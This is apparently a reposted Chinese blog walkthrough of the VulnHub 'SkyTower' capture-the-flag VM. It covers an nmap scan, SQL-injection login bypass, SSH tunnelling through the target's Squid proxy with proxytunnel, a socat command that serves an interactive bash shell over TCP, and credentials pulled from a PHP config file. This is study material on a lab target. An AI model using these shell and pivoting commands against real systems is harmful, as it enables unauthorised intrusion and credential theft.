首页 > 其他分享 >vulnhub-SkyTower

vulnhub-SkyTower

时间:2022-12-29 11:36:18浏览次数:62  
标签:http 登录 SkyTower 22 192.168 vulnhub 56.101 ssh

kali:192.168.56.109
靶机:192.168.56.101

nmap -A -O -p- 192.168.56.101

Not shown: 65532 closed tcp ports (reset)
PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.22 (Debian)
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
|_http-server-header: squid/3.1.20
MAC Address: 08:00:27:54:4A:37 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.10, Linux 3.2 - 3.16
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   1.37 ms severnaya-station.com (192.168.56.101)

访问80页面得到登录框,使用sqlmap无果。尝试手动注入,发现会过滤sql语句,从网上下载sqli字典,再用burp suit尝试:



得到用户名与密码 john:hereisjohn 

代理工具 proxychains,proxytunnel

proxytunnel

-a 指定本地侦听端口
-p 使用代理
-r 使用第二个代理
-d 指定访问的目标端口

proxytunnel -p 192.168.56.101:3128 -d 127.0.0.1:22 -a 1234
将kali与目标的3128端口建立隧道,目标再将流量转发到本机22端口,然后再映射到本机1234端口

ssh [email protected] -p 1234 #可成功连接

通过靶机提供的代理程序登录ssh,发现ssh只能执行命令,不允许登录。可使用命令:proxychains ssh [email protected] /bin/bash也可使用nc反弹shell

下载socat
使用 HOME=/dev/shm ./socat tcp:192.168.56.101:9998 exec:'/bin/bash -li',pty,stderr,sigint,sighup,sigquit,sane 显示出代码提示符
此时没有代码补全
使用 script -qc bash /dev/null 即可补全代码

之所以不能是因为 .bashrc 文件中的配置,将 ~/.bashrc 重命名,之后便可正常登录ssh

查看php配置文件,得到mysql用户名与密码:

登录mysql得到用户名与密码

使用账号sara登录,也存在无法直接登录shell的问题。登录后发现:

 

标签:http,登录,SkyTower,22,192.168,vulnhub,56.101,ssh
From: https://www.cnblogs.com/zhh567/p/17012033.html

相关文章

  • Vulnhub之Momentum靶机测试过程
    Momentum识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/Momentum]└─$sudonetdiscover-ieth1-r192.168.56.0/24Currentlyscanning:Finished!|ScreenV......
  • vulnhub-Stapler
    kali:192.168.56.109靶机:192.168.56.121nmap-sS-sV-O-T5-p-192.168.56.121Nmapscanreportfor192.168.56.121Hostisup(0.0020slatency).Notshown:65523......
  • vulnhub靶场之HACKABLE: III
    准备:攻击机:虚拟机kali、本机win10。靶机:Hackable:III,下载地址:https://download.vulnhub.com/hackable/hackable3.ova,下载后直接vbox打开即可。知识点:lxd提权、hydra爆......
  • Vulnhub之My CMSCMS靶机详细测试过程(采用不同的拿web shell的方法)
    MyCMSCMS作者:Jason_huawen靶机基本信息名称:MyCMSMS:1地址:识别目标主机IP地址─(kali㉿kali)-[~/Vulnhub/MyCMSCMS]└─$sudonetdiscover-ieth1Currentl......
  • vulnhub靶场之GROTESQUE: 3.0.1
    准备:攻击机:虚拟机kali、本机win10。靶机:Grotesque:3.0.1,下载地址:https://download.vulnhub.com/grotesque/grotesque3.zip,下载后直接vbox打开即可。知识点:ffuf参数爆破......
  • vulnhub-Tr0ll2
     Tr0ll:2~VulnHubwww.vulnhub.com/entry/tr0ll-2,107/kali192.168.56.109靶机192.168.56.120nmap-sS-A-O-p-192.168.56.120Nmapscanreportfor192.168......
  • vulnhub-LordOfTheRoot
    https://www.vulnhub.com/entry/lord-of-the-root-101,129/本机10.0.2.4靶机10.0.2.15靶机是桌面版ubuntu,提示了登录用户名smeagolnamp扫描,发现只有22端口开放。使......
  • vulnhub-IMF
    www.vulnhub.com/entry/imf-1,162/kali 192.168.10.7靶机192.168.10.10nmap-sV-A-O-p-192.168.10.10Nmapscanreportfor192.168.10.10Hostisup(0.0020......
  • vulnhub靶场,Me-and-My-Girlfriend-1
    靶场地址和背景:https://www.vulnhub.com/entry/me-and-my-girlfriend-1,409/Description:ThisVMtellsusthatthereareacoupleofloversnamelyAliceandBob,......
  • vulnhub-DerpNStink
    DerpNStink:1~VulnHub www.vulnhub.com/entry/derpnstink-1,221/修改hosts文件,使IP绑定到derpnstink.localkaliip:192.168.56.109主机扫描主机发现nmap-sn......